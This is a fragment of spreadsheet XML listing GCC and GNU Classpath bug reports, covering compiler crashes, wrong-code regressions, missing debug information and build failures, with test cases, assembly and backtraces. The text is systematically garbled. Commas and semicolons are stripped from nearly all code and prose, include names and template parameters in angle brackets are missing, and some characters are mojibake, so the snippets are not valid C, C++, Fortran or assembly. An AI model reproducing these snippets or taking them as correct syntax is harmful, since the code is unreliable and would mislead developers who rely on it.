here (so we vectorize reductions with veclib vectorized calls as well).
Ira?</t>
  </si>
  <si>
    <t>GCC-64508</t>
  </si>
  <si>
    <t>[F03] interface check missing for procedure pointer component as actual argument</t>
  </si>
  <si>
    <t>Inspired by the discussion at:
https://groups.google.com/forum/?fromgroups=#!topic/comp.lang.fortran/svfanCGU2vU
Example code:
module m
   TYPE :: parent
   END TYPE parent
   TYPE EXTENDS(parent) :: extension
     INTEGER :: extension_component = 0
      procedure(extension_proc) pointer :: ppc
   END TYPE extension
contains
   SUBROUTINE parent_proc(arg)
     CLASS(parent) INTENT(IN) :: arg
     PRINT * 'I am parent_proc'
   END SUBROUTINE parent_proc
   SUBROUTINE extension_proc(arg)
     CLASS(extension) INTENT(IN) :: arg
     PRINT * 'I am extension_proc'
     PRINT * arg%extension_component
   END SUBROUTINE extension_proc
   SUBROUTINE some_proc(proc)
     PROCEDURE(parent_proc) :: proc
     TYPE(Parent) :: a
     CALL proc(a)
   END SUBROUTINE some_proc
end module
program test
  use m
   CLASS(extension) ALLOCATABLE :: x
   procedure(parent_proc) pointer :: ppp
   procedure(extension_proc) pointer :: ppe
   CALL some_proc(parent_proc)     ! ok
   CALL some_proc(extension_proc)  ! interface mismatch
   ppp =&gt; extension_proc           ! interface mismatch
   call some_proc(ppp)
   ppe =&gt; extension_proc
   call some_proc(ppe)             ! interface mismatch
   allocate(x source= Extension(666extension_proc))
   CALL some_proc(x%ppc)           !  XXX: mismatch not detected
end
As the above example shows interface checking is done for ordinary procedures and procedure pointers as actual arguments to dummy procedures. However it is missing for procedure-pointer components.</t>
  </si>
  <si>
    <t>GCC-35463</t>
  </si>
  <si>
    <t>[4.4 only] typedef missing in debug information with -gdwarf-2 for c++</t>
  </si>
  <si>
    <t>typedef struct {
  int x
} mystruct
mystruct m
is missing any debug information for mystruct.  If one compiles as C mystruct is present.
Still broken in 20080308 compiler.  Should be target independent.</t>
  </si>
  <si>
    <t>mikestump</t>
  </si>
  <si>
    <t>GCC-13260</t>
  </si>
  <si>
    <t>[3.4 Regression] Incorrect optimisation of loop termination condition</t>
  </si>
  <si>
    <t>This problem was first seen when building the Linux kernel in the function
root_nfs_parse_addr(). I've extracted this into a small stand alone
program which demonstrates the problem.
When built with an older gcc the results are as expected however this fails
on more recent versions of gcc. Turning the optimisation down to -O1 also
allows the program to work correctly. Also uncommenting the printf in the
middle of the code makes it work correctly.
Of the gcc versions I've tried versions 3.0.3 and the 3.2.1
(prerelease) which SuperH ship work OK. However version 3.3.1 3.3.2
and the latest 3.4 snapshot (20031126) all generate incorrect code.
The problem centers around a new optimisation which gcc has spotted but
doesn't appear to get quite right.
In gcc 3.2.1 the code generated looks like:
	cmp/gt	r3r7
	movt	r2
	tst	r2r2
	movt	r1
	cmp/pl	r2
	add	r1r8
	bf/s	.L16
	mov	r8r3
In 3.3.2 it has spotted that after the 'tst' the T flag already
indicates whether to take the branch or not and so the extra register
and comparison are redundant. However to do this the branch has to be
reversed into a bt/s and this is not being done:
	cmp/gt	r3r7
	movt	r1
	tst	r1r1
	movt	r1
	add	r1r8
	bf/s	.L16
	mov	r8r3
The code generated by 3.4 (20031126) is identical.
--------------
Compilation diagnostics:
% /var/tmp/gcc-3.4-20031126/objdir/gcc/xgcc
-B/var/tmp/gcc-3.4-20031126/objdir/gcc/ -O2 -S ipconfig.c -nostdinc -I
/opt/STM/ST40R2.1.3/sh-superh-elf/include/ -v -save-temps
Reading specs from /var/tmp/gcc-3.4-20031126/objdir/gcc/specs
Configured with: ../configure --host=i686-pc-linux-gnu --target=sh4-linux --pref
ix=/opt/STM/ST40Linux-1.0/devkit/sh4 --exec-prefix=/opt/STM/ST40Linux-1.0/devkit
/sh4 --bindir=/opt/STM/ST40Linux-1.0/devkit/sh4/bin --sbindir=/opt/STM/ST40Linux
-1.0/devkit/sh4/sbin --sysconfdir=/opt/STM/ST40Linux-1.0/devkit/sh4/etc --datadi
r=/opt/STM/ST40Linux-1.0/devkit/sh4/share --includedir=/opt/STM/ST40Linux-1.0/de
vkit/sh4/include --libdir=/opt/STM/ST40Linux-1.0/devkit/sh4/lib --libexecdir=/op
t/STM/ST40Linux-1.0/devkit/sh4/libexec --localstatedir=/opt/STM/ST40Linux-1.0/de
vkit/sh4/var --sharedstatedir=/opt/STM/ST40Linux-1.0/devkit/sh4/share --mandir=/
opt/STM/ST40Linux-1.0/devkit/sh4/man --infodir=/opt/STM/ST40Linux-1.0/devkit/sh4
/info --program-transform-name=s^sh4-linux- --enable-shared --enable-language
s=cc++ --enable-threads=posix --enable-c99 --enable-long-long --with-system-zli
b --disable-multilib --enable-symvers=gnu --enable-__cxa_atexit --with-gxx-inclu
de-dir=${prefix}/target//usr/include/g++-
Thread model: posix
gcc version 3.4 20031126 (experimental)
 /var/tmp/gcc-3.4-20031126/objdir/gcc/cc1 -E -quiet -nostdinc -v -I /opt/STM/ST4
0R2.1.3/sh-superh-elf/include/ -iprefix /var/tmp/gcc-3.4-20031126/objdir/gcc/../
lib/gcc/sh4-linux/3.4/ -isystem /var/tmp/gcc-3.4-20031126/objdir/gcc/include ipc
onfig.c -O2 -o ipconfig.i
#include ... search starts here:
#include  search starts here:
 /opt/STM/ST40R2.1.3/sh-superh-elf/include/
 /var/tmp/gcc-3.4-20031126/objdir/gcc/include
End of search list.
 /var/tmp/gcc-3.4-20031126/objdir/gcc/cc1 -fpreprocessed ipconfig.i -quiet -dump
base ipconfig.c -auxbase ipconfig -O2 -version -o ipconfig.s
GNU C version 3.4 20031126 (experimental) (sh4-linux)
        compiled by GNU C version 3.2.2 20030222 (Red Hat Linux 3.2.2-5).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096</t>
  </si>
  <si>
    <t>stuart.menefy</t>
  </si>
  <si>
    <t>GCC-29925</t>
  </si>
  <si>
    <t>Wrong code with -ftree-vectorize</t>
  </si>
  <si>
    <t>I just hit what seems to be a wrong code generation bug in gcc. The bug happens only when compiling the attached file with:
gcc -g -O1 -ffast-math -ftree-vectorize gcc_bug.c -o gcc_bug
Removing any one of -O1 -ffast-math -ftree-vectorize makes the problem go away. When I run the complete code (which is in the Speex codec BTW) not only do I get the wrong result but there is a read past array that happens. With the reduced example only the read error is visible and valgrind reports:
==9508== Invalid read of size 8
==9508==    at 0x4004E3: interp_pitch (gcc_bug.c:17)
==9508==    by 0x4005D2: main (gcc_bug.c:29)
==9508==  Address 0x4D64224 is 500 bytes inside a block of size 504 alloc'd
==9508==    at 0x4A1FB37: calloc (vg_replace_malloc.c:279)
==9508==    by 0x4005A8: main (gcc_bug.c:25)
This is on an Ubuntu 64-bit Edgy machine with gcc -v:
Using built-in specs.
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-checking=release x86_64-linux-gnu
Thread model: posix
gcc version 4.1.2 20060928 (prerelease) (Ubuntu 4.1.1-13ubuntu5)</t>
  </si>
  <si>
    <t>jean-marc.valin</t>
  </si>
  <si>
    <t>GCC-12678</t>
  </si>
  <si>
    <t>ICE on large vector arguments to a function</t>
  </si>
  <si>
    <t>$ cat mmx.c
typedef int v16si __attribute__ ((mode(V16QI)))
v16si
func (v16si a v16si b)
{
  return a + b
}
$ gcc -c -o mmx.o mmx.c
mmx.c: In function `func':
mmx.c:8: internal compiler error: in ix86_function_arg_boundary at
config/i386/i386.c:2458
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gcc -c -o mmx.o mmx.c -march=athlon-xp
mmx.c: In function `func':
mmx.c:8: error: insn does not satisfy its constraints:
(insn 44 29 33 0 (set (reg:SI 21 exmm0)
        (reg:SI 0 eax)) 38 {*movsi_1} (nil)
    (nil))
mmx.c:8: internal compiler error: in extract_constrain_insn_cached at recog.c:2090
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>jivera</t>
  </si>
  <si>
    <t>GCC-14285</t>
  </si>
  <si>
    <t>[tree-ssa] current_function_needs_context is not declared</t>
  </si>
  <si>
    <t>current_function_needs_context seems to be gone now so
the above ports don't build anymore (even with --disable-mudflap).</t>
  </si>
  <si>
    <t>kazu</t>
  </si>
  <si>
    <t>GCC-380</t>
  </si>
  <si>
    <t>gcc 2.91.66 crashes on certain 32bit -&gt; 64bit conversions</t>
  </si>
  <si>
    <t>gcc reports an internal compiler error when doing 32bit to
64bit conversions under certain circumstances.  This only 
occurs when optimization is turned on -O2.  I've narrowed
the code down to what I think is the smallest subset that 
still exhibits the behavior.
Release:
gcc version egcs-2.91.66 19990314 (egcs-1.1.2 release)
Environment:
#uname -a
Linux skunk.3dfx.com 2.2.13ac2 #1 SMP Mon Nov 8 08:26:19 PST 1999 i686 unknown
How-To-Repeat:
skunk: /home/arm/gccbug&gt;g++ -v --save-temps -O2 foo.c -o foo
Reading specs from /home/arm/trees/TOOLROOT/Linux/lib/gcc-lib/i686-pc-linux-gnu/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314 (egcs-1.1.2 release)
GNU CPP version egcs-2.91.66 19990314 (egcs-1.1.2 release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /home/arm/trees/TOOLROOT/Linux/lib/gcc-lib/i686-pc-linux-gnu/egcs-2.91.66/include
 /usr/local/include
 /usr/include
End of search list.
 /home/arm/trees/TOOLROOT/Linux/lib/gcc-lib/i686-pc-linux-gnu/egcs-2.91.66/cc1plus foo.ii -quiet -dumpbase foo.cc -O2 -version -o foo.s
GNU C++ version egcs-2.91.66 19990314 (egcs-1.1.2 release) (i686-pc-linux-gnu) compiled by GNU C version egcs-2.91.66 19990314 (egcs-1.1.2 release).
foo.c: In function `int main()':
foo.c:9: Internal compiler error.
foo.c:9: Please submit a full bug report to `egcs-bugs@egcs.cygnus.com'.
foo.c:9: See  for details.
following program compiled with g++ -O2 foo.c -o foo
int main(void)
{
  enum { a } 
  int i
  long long ll[2]
  ll[0] = i 
}</t>
  </si>
  <si>
    <t>arm</t>
  </si>
  <si>
    <t>GCC-69637</t>
  </si>
  <si>
    <t>ICE on an invalid bit-field with template name for width</t>
  </si>
  <si>
    <t>I ran into the following ICE when I accidentally put the  3 just past the template argument list (instead of typing foo()):
  template 
  constexpr int foo () { return N }
  struct B { unsigned c: foo 3() }
The problem can be further reduced to the following (invalid) test case.  All supported versions of GCC fail similarly.
$ cat t.c &amp;&amp; /build/gcc-trunk/gcc/xgcc -B /build/gcc-trunk/gcc -S -Wall -Wextra -Wpedantic -std=c++11 -xc++ t.c
template 
int foo () { return 1 }
struct B {
    unsigned c: foo
}
t.c:5:17: error: width of bit-field â€˜câ€™ has non-integral type â€˜â€™
     unsigned c: foo
                 ^~~
t.c:5:17: internal compiler error: unexpected expression â€˜fooâ€™ of kind overload
0xaab7c1 cxx_eval_constant_expression
	/src/gcc/trunk/gcc/cp/constexpr.c:3815
0xaabb75 cxx_eval_outermost_constant_expr
	/src/gcc/trunk/gcc/cp/constexpr.c:3870
0xaac23b cxx_constant_value(tree_node* tree_node*)
	/src/gcc/trunk/gcc/cp/constexpr.c:3957
0x8c76c5 check_bitfield_decl
	/src/gcc/trunk/gcc/cp/class.c:3439
0x8c9c3d check_field_decls
	/src/gcc/trunk/gcc/cp/class.c:3818
0x8d55c8 check_bases_and_members
	/src/gcc/trunk/gcc/cp/class.c:5738
0x8db8d8 finish_struct_1(tree_node*)
	/src/gcc/trunk/gcc/cp/class.c:6887
0x8ddb0e finish_struct(tree_node* tree_node*)
	/src/gcc/trunk/gcc/cp/class.c:7201
0x943814 cp_parser_class_specifier_1
	/src/gcc/trunk/gcc/cp/parser.c:21290
0x9444f9 cp_parser_class_specifier
	/src/gcc/trunk/gcc/cp/parser.c:21518
0x938d3e cp_parser_type_specifier
	/src/gcc/trunk/gcc/cp/parser.c:15817
0x933904 cp_parser_decl_specifier_seq
	/src/gcc/trunk/gcc/cp/parser.c:12738
0x932e73 cp_parser_simple_declaration
	/src/gcc/trunk/gcc/cp/parser.c:12281
0x932dfb cp_parser_block_declaration
	/src/gcc/trunk/gcc/cp/parser.c:12228
0x932b6e cp_parser_declaration
	/src/gcc/trunk/gcc/cp/parser.c:12125
0x9326a2 cp_parser_declaration_seq_opt
	/src/gcc/trunk/gcc/cp/parser.c:12004
0x921e73 cp_parser_translation_unit
	/src/gcc/trunk/gcc/cp/parser.c:4321
0x971d71 c_parse_file()
	/src/gcc/trunk/gcc/cp/parser.c:37357
0xb2f3dd c_common_parse_file()
	/src/gcc/trunk/gcc/c-family/c-opts.c:1064
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-29631</t>
  </si>
  <si>
    <t>[4.1 regression] bug with promoted induction variable</t>
  </si>
  <si>
    <t>This is extracted from gnushogi (http://bugs.debian.org/393075).
falk@juist:~% cat bug.c
const signed char nunmap[] = { 17 -1 1 }
__attribute__((noinline))
void ff(int i) {
    asm volatile()
}
__attribute__((noinline))
void f(short delta) {
    short p0 = 2 s
    for (s = 0 s &lt; 2 s++) {
        p0 += delta
        ff(s)
        if (nunmap[p0] == 17)
            asm volatile(# nop)
    }
}
int main() {
    f(-1)
    return 0
}
falk@juist:~% gcc-3.4 -O2 bug.c &amp;&amp; ./a.out   
falk@juist:~% gcc-4.2 -O2 bug.c &amp;&amp; ./a.out    
falk@juist:~% gcc-4.1 -O2 bug.c &amp;&amp; ./a.out 
zsh: segmentation fault (core dumped)  ./a.out
Reason seems to be that delta is zero extended not sign extended:
$f..ng:
        lda $30-32($30)
        ldah $1nunmap($29)             !gprelhigh
        lda $1nunmap($1)               !gprellow
        stq $98($30)
        stq $1016($30)
        mov $31$9
        stq $1124($30)
        lda $103($1)        # $10 = numap + 3
        zapnot $163$11     # $11 = zero extend delta (=65535)
        stq $260($30)
        .prologue 1
$L4:
        addq $10$11$10     # $10 += $11
        addl $31$9$16
        bsr $26ff              !samegp
        ldq_u $1-1($10)     # access numap[65537] -&gt; SEGV
        extqh $1$10$1
        sra $156$1
        cmpeq $117$1
        bne $1$L12
$L5:
        lda $91($9)
        cmpeq $92$1
        beq $1$L4
        ldq $260($30)
        ldq $98($30)
        ldq $1016($30)
        ldq $1124($30)
        lda $3032($30)
        ret $31($26)1
        .align 4
$L12:
        .set    macro
        # nop
        .set    nomacro
        br $31$L5</t>
  </si>
  <si>
    <t>falk</t>
  </si>
  <si>
    <t>GCC-11669</t>
  </si>
  <si>
    <t>[3.4 regression] Calling of static functions does not work (build of glibc broken)</t>
  </si>
  <si>
    <t>This is a testcase reduced from a failure to compile glibc on i686-linux-gnu
with current GCC:
gromit:~/tmp:[0]$ /opt/gcc/3.4-devel/bin/gcc -c test-failure.c -O2     
gromit:~/tmp:[0]$ nm test-failure.o 
00000010 T call_fixup
00000000 t fixup
gromit:~/tmp:[0]$ /opt/gcc/3.4-devel/bin/gcc -c test-failure.c -O2 -DUSE_DECLARATION
gromit:~/tmp:[0]$ nm test-failure.o 
00000010 T call_fixup
         U fixup
00000000 t fixup.0
The fixup.0 declaration is wrong here.  I suspect the IMI patches and assigned
it therefore to Geoff Keating.
To reproduce use the simple follwing simple code snippet:
#if USE_DECLARATION
/* Removing the prototype makes this work.  */
static int fixup (int i) __attribute__ ((used))
#endif
static int __attribute__ ((__used__))
fixup (int i)
{
  return i+1
}
int
call_fixup (void)
{
  asm (call fixup\n\t)
  return 0
}</t>
  </si>
  <si>
    <t>geoffk</t>
  </si>
  <si>
    <t>aj</t>
  </si>
  <si>
    <t>GCC-4935</t>
  </si>
  <si>
    <t>errno</t>
  </si>
  <si>
    <t>In my project I currently use gcc 3.0.2 as compiler and mathematical
functions(such as log10 sqrt ...). I discovered when I use optimization zero 
zero and check if those functions had an wrong parameter by testing
errno this is set properly. When I use any kind of optimization 
is not set properly for sqrt function. I used before gcc 2.95.2
and this bug was present for all mathematical function when
my code was compiled with optimization.
Release:
3.0.2
Environment:
Linux i386 Suse 7.2 kernel 2.4.4-4GB.
Options for configure were 
configure --with-gcc-version-trigger=/home/staff/coman/tmp/gcc-3.0.2/gcc/version.c --host=i686-pc-linux-gnu --prefix=/home/staff/coman/tmp/gcc --norecursion
How-To-Repeat:
Compile the source file with optimization level 0 and 2
and see the difference.</t>
  </si>
  <si>
    <t>liviu.coman</t>
  </si>
  <si>
    <t>GCC-79818</t>
  </si>
  <si>
    <t>[7 Regression] wrong code with -fwrapv and -Os/-O1/-O2/-O3</t>
  </si>
  <si>
    <t>Created attachment 40871
test case
Linux x86_64
$ /usr/local/gcc-0f7b961/bin/gcc --version
gcc (GCC) 7.0.1 20170302 (experimental)
$ /usr/local/gcc-0f7b961/bin/gcc -fwrapv -O1 -o test test.c  ./test
Aborted
$ /usr/local/gcc-0f7b961/bin/gcc -fwrapv -O2 -o test test.c  ./test
Aborted</t>
  </si>
  <si>
    <t>mednafen</t>
  </si>
  <si>
    <t>GCC-8836</t>
  </si>
  <si>
    <t>char_traits undefined at link time ( char_traits is OK )</t>
  </si>
  <si>
    <t>gint8 from glib is
typedef signed char gint8
using basic_streambuf fails at link with 
undefined reference to `std::char_traits::eof()'
undefined reference to `std::char_traits::eq_int_type(unsigned long const&amp; unsigned long const&amp;)'
undefined reference to `std::char_traits::eof()'
undefined reference to `std::char_traits::not_eof(unsigned long const&amp;)'
etc...
Works fine if typedef is changed to use 'char' instead of 'signed char'.
Release:
3.2.1
Environment:
i386-pc-linux-gnu (RedHat 7.3)
How-To-Repeat:
#include 
typedef signed char c_type
class buf : public std::basic_streambuf
{
public:
    buf()
        {
        }
    virtual ~buf()
        {
        }
}
int main (int argc char * argv[] )
{
    buf * b = new buf
    return 0
}</t>
  </si>
  <si>
    <t>richarda</t>
  </si>
  <si>
    <t>GCC-68597</t>
  </si>
  <si>
    <t>[6 Regression] ice in check_return_expr at cp/typeck.c:8635</t>
  </si>
  <si>
    <t>Below code causes this stack trace when compiled with -std=c++1z when compiled with
rnburn@localhost ~/bugs/lambda_check_return $ g++17 --version
g++ (GCC) 6.0.0 20151123 (experimental)
Copyright (C) 2015 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
main.cpp: In lambda function:
main.cpp:19:35: internal compiler error: in check_return_expr at cp/typeck.c:8635
       return 1 / beta * (alpha - 1)
                                   ^
0x75f9dd check_return_expr(tree_node* bool*)
	../../src-fix/gcc/cp/typeck.c:8635
0x79bfae finish_return_stmt(tree_node*)
	../../src-fix/gcc/cp/semantics.c:867
0x73a6dd cp_parser_jump_statement
	../../src-fix/gcc/cp/parser.c:11414
0x73a6dd cp_parser_statement
	../../src-fix/gcc/cp/parser.c:10035
0x74239f cp_parser_implicitly_scoped_statement
	../../src-fix/gcc/cp/parser.c:11527
0x73aab1 cp_parser_selection_statement
	../../src-fix/gcc/cp/parser.c:10555
0x73aab1 cp_parser_statement
	../../src-fix/gcc/cp/parser.c:10010
0x74239f cp_parser_implicitly_scoped_statement
	../../src-fix/gcc/cp/parser.c:11527
0x73aab1 cp_parser_selection_statement
	../../src-fix/gcc/cp/parser.c:10555
0x73aab1 cp_parser_statement
	../../src-fix/gcc/cp/parser.c:10010
0x73ae41 cp_parser_statement_seq_opt
	../../src-fix/gcc/cp/parser.c:10426
0x741662 cp_parser_lambda_body
	../../src-fix/gcc/cp/parser.c:9894
0x741662 cp_parser_lambda_expression
	../../src-fix/gcc/cp/parser.c:9378
0x70f887 cp_parser_primary_expression
	../../src-fix/gcc/cp/parser.c:4753
0x71b523 cp_parser_postfix_expression
	../../src-fix/gcc/cp/parser.c:6444
0x7199f9 cp_parser_unary_expression
	../../src-fix/gcc/cp/parser.c:7688
0x724059 cp_parser_binary_expression
	../../src-fix/gcc/cp/parser.c:8441
0x7248bf cp_parser_assignment_expression
	../../src-fix/gcc/cp/parser.c:8712
0x724d35 cp_parser_constant_expression
	../../src-fix/gcc/cp/parser.c:8964
0x73c4e7 cp_parser_init_declarator
	../../src-fix/gcc/cp/parser.c:18147
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
/////////////////////////////////////////////////////////////////////
#include                                                                  
auto make_test_objective3(double beta double l int&amp; evaluation_counter) {      
  auto phi0 = [=](double alpha) {                                                
    if (alpha &lt;= 1-beta)                                                         
      return 1-alpha                                                            
    else if (alpha &gt;= 1+beta)                                                    
      return alpha-1                                                            
    else                                                                         
      return 1 / (2*beta)*std::pow(alpha-12)+beta/2                            
  }                                                                             
  auto phi0_prime = [=](double alpha) {                                          
    if (alpha &lt;= 1-beta)                                                         
      return -1                                                                 
    else if (alpha &gt;= 1+beta)                                                    
      return 1                                                                  
    else                                                                         
      return 1 / beta * (alpha - 1)                                             
  }                                                                             
}                                                                                
int main() {                                                                     
  return 0                                                                      
} 
/////////////////////////////////////////////////////////////////////</t>
  </si>
  <si>
    <t>ryan.burn</t>
  </si>
  <si>
    <t>GCC-50735</t>
  </si>
  <si>
    <t>[4.7 Regression] gcc.dg/torture/vector-2.c:52:1: ICE: verify_ssa failed at -O1 and above</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.dg/torture/vector-2.c    -O1    -lm   -o ./vect
or-2.exe    (timeout = 300)/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/torture/vector-2.c: In function 'f0':
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/torture/vector-2.c:52:1: error: statement makes a memory store but has no VDEFSBIT_FIELD_REF  = a_2(D)
/test/gnu/gcc/gcc/gcc/testsuite/gcc.dg/torture/vector-2.c:52:1: internal compile
r error: verify_ssa failed
-bash-3.2$ ./xgcc -B./ -v
Reading specs from ./specs
COLLECT_GCC=./xgcc
COLLECT_LTO_WRAPPER=./lto-wrapper
Target: hppa2.0w-hp-hpux11.11
Configured with: ../gcc/configure --with-gnu-as --with-as=/opt/gnu/bin/as --enable-shared --with-local-prefix=/opt/gnu --prefix=/opt/gnu/gcc/gcc-4.7 --with-gmp=/opt/gnu/gcc/gmp --enable-threads=posix --enable-debug=no --disable-nls --without-cloog --without-ppl --enable-languages=cc++objcfortranjavaadaobj-c++
Thread model: posix
gcc version 4.7.0 20111013 (experimental) [trunk revision 179947] (GCC)</t>
  </si>
  <si>
    <t>GCC-17343</t>
  </si>
  <si>
    <t>[4.0 Regression] a dispatch table can be shortened for certain switch statements</t>
  </si>
  <si>
    <t>Consider:
void foo0(void)
void foo1(void)
void foo2(void)
void foo3(void)
void
foo (int a)
{
  switch (a)
    {
    case 10:
    case 11:
    case 12:
    case 13:
      goto ddd
    case 14:
      foo1()
      break
    case 15:
      foo2()
      break
    case 16:
      foo3()
      break
    default:
    ddd:
      foo0()
      break
    }
}
On i686-pc-linux-gnu with -O2 -fomit-frame-pointer the above code
turns into:
foo:
        movl    4(%esp) %eax
        subl    $10 %eax
        cmpl    $6 %eax
        ja      .L2
        jmp     *.L6(%eax4)
        .section        .rodata
        .align 4
        .align 4
.L6:
        .long   .L2
        .long   .L2
        .long   .L2
        .long   .L2
        .long   .L3
        .long   .L4
        .long   .L5
        .text
        .p2align 23
.L2:
        jmp     foo0
        .p2align 23
.L5:
        jmp     foo3
        .p2align 23
.L3:
        jmp     foo1
        .p2align 23
.L4:
        jmp     foo2
Note that the function subtracts 10 from the argument and that the
first four entries of the dispatch table are the same as the default
case.
Therefore if we subtracted 14 we could make the dispatch table
shorter effectively treating cases 10 .. 13 as the default case.</t>
  </si>
  <si>
    <t>CLASSPATH-16746</t>
  </si>
  <si>
    <t>awt</t>
  </si>
  <si>
    <t>IAA.ImageScrollbarTest: Initial Layout Incorrect</t>
  </si>
  <si>
    <t>If you run the Acunia test suite and run IAA.ImageScrollbarTest
you'll see that the initial layout is incorrect.  The components are
sized larger than the window so that some components stretch below
the visible area and are hidden.</t>
  </si>
  <si>
    <t>djee</t>
  </si>
  <si>
    <t>GCC-4115</t>
  </si>
  <si>
    <t>3.0.1 build bug on solaris 2.7 using 2.95.2</t>
  </si>
  <si>
    <t>tried the following all giv ethe same error:
./configure --prefix=/sup
LD=/sup/bin/ld ./configure --prefix=/sup
make
make bootstrap
LD=/sup/bin/ld make
The problem is that there seems to be a mix of the sun linker and gnu's
linker... I may have a badly built 2.95.2 as I've seen this problem
elsewhere.  This should probably be added as an autoconf check.  I have
no idea on how to get rid of it though.
...build OK up to here...
mv tmp-libgcc.map libgcc.map
!
itf.o libgcc/./_clear_cache.o libgcc/./_trampoline.o libgcc/./__main.o libgcc/./_exit.o libgcc/./_absvsi2.o libgcc/./_absvdi2.o libgcc/./_addvsi3.o libgcc/./_addvdi3.o libgcc/./_subvsi3.o libgcc/./_subvdi3.o libgcc/./_mulvsi3.o libgcc/./_mulvdi3.o libgcc/./_negvsi2.o libgcc/./_negvdi2.o libgcc/./_ctors.o libgcc/./unwind-dw2.o libgcc/./unwind-dw2-fde.o libgcc/./unwind-sjlj.o -lc &amp;&amp; rm -f libgcc_s.so.1 &amp;&amp; ln -s libgcc_s.so libgcc_s.so.1
/sup/sparc-sun-solaris2.7/bin/ld:libgcc.map: file format not recognized treating as linker script
/sup/sparc-sun-solaris2.7/bin/ld:libgcc.map:1: parse error
collect2: ld returned 1 exit status
make[3]: *** [libgcc_s.so] Error 1
make[3]: Leaving directory `/sup/build/gcc-3.0.1/gcc'
make[2]: *** [libgcc.a] Error 2
make[2]: Leaving directory `/sup/build/gcc-3.0.1/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory `/sup/build/gcc-3.0.1/gcc'
make: *** [bootstrap] Error 2
Release:
3.0.1
Environment:
System: SunOS topaze 5.7 Generic_106541-02 sun4u sparc SUNWUltra-5_10
Architecture: sun4
host: sparc-sun-solaris2.7
build: sparc-sun-solaris2.7
target: sparc-sun-solaris2.7
configured with: ./configure --prefix=/sup
How-To-Repeat:
 May be difficult to reproduce.  It should be checked for and prevented.
Unformatted:
 --==_Exmh_-1310831154P
 Content-Type: text/plain charset=us-ascii
 SEND-PR: Leave Confidential as no all GCC PRs are public.
 SEND-PR: critical     GCC is completely not operational no work-around known.
 SEND-PR: serious      GCC is not working properly a work-around is possible.
 SEND-PR: non-critical Report indicates minor problem.
 SEND-PR: medium       The problem should be solved in the next release.
 SEND-PR: low          The problem should be solve in a future release.
 SEND-PR: doc-bug          The documentation is incorrect.
 SEND-PR: accepts-illegal  GCC fails to reject erroneous code.
 SEND-PR: rejects-legal    GCC gives an error message for correct code.
 SEND-PR: wrong-code       The machine code generated by gcc is incorrect.
 SEND-PR: ice-on-legal-code   GCC gives an Internal Compiler Error (ICE)
 SEND-PR:                     for correct code
 SEND-PR: ice-on-illegal-code GCC gives an ICE instead of reporting an error
 SEND-PR: pessimizes-code     GCC misses an important optimization opportunity
 SEND-PR: sw-bug              Software bug of some other class than above
 SEND-PR: change-request      A feature in GCC is missing.
 SEND-PR: support             I need help with gcc.</t>
  </si>
  <si>
    <t>lohner</t>
  </si>
  <si>
    <t>GCC-45162</t>
  </si>
  <si>
    <t>[4.6 regression] ARM bootstrap comparison failures after stage 3</t>
  </si>
  <si>
    <t>Attempting to bootstrap gcc-4.6-20100731 (r162788) on armv5tel-linux-gnueabi fails due to bootstrap comparison failures after stage 3:
make[3]: Leaving directory `/home/mikpe/objdir46'
Comparing stages 2 and 3
warning: gcc/cc1plus-checksum.o differs
warning: gcc/cc1-checksum.o differs
warning: gcc/cc1objplus-checksum.o differs
warning: gcc/cc1obj-checksum.o differs
Bootstrap comparison failure!
gcc/lto-cgraph.o differs
gcc/value-prof.o differs
gcc/tree-vect-data-refs.o differs
gcc/expr.o differs
gcc/tree-ssa-loop-ivopts.o differs
gcc/lto-streamer-out.o differs
gcc/stor-layout.o differs
gcc/tree-ssa-loop-ivcanon.o differs
gcc/loop-iv.o differs
gcc/double-int.o differs
gcc/expmed.o differs
gcc/dbxout.o differs
gcc/tree.o differs
gcc/sreal.o differs
gcc/cfgloopanal.o differs
gcc/explow.o differs
libcpp/expr.o differs
make[2]: *** [compare] Error 1
make[2]: Leaving directory `/home/mikpe/objdir46'
make[1]: *** [stage3-bubble] Error 2
make[1]: Leaving directory `/home/mikpe/objdir46'
make: *** [bootstrap] Error 2
Target: armv5tel-brewer-linux-gnueabi
Configured with: /home/mikpe/gcc-4.6-20100731/configure --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-languages=cc++objcobj-c++javafortran --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --disable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --disable-sjlj-exceptions --with-arch=armv5te --with-tune=xscale --build=armv5tel-brewer-linux-gnueabi --with-gmp=/home/mikpe/pkgs/linux-armv5l/gmp-4.3.2 --with-mpfr=/home/mikpe/pkgs/linux-armv5l/mpfr-2.4.2 --with-mpc=/home/mikpe/pkgs/linux-armv5l/mpc-0.8.2 --disable-plugin --disable-lto --disable-libmudflap</t>
  </si>
  <si>
    <t>mikpelinux</t>
  </si>
  <si>
    <t>GCC-57717</t>
  </si>
  <si>
    <t>error: unrecognizable insn compiling ./strtod_l.c from glibc on powerpc-gnuspe</t>
  </si>
  <si>
    <t>Created attachment 30363
testcase
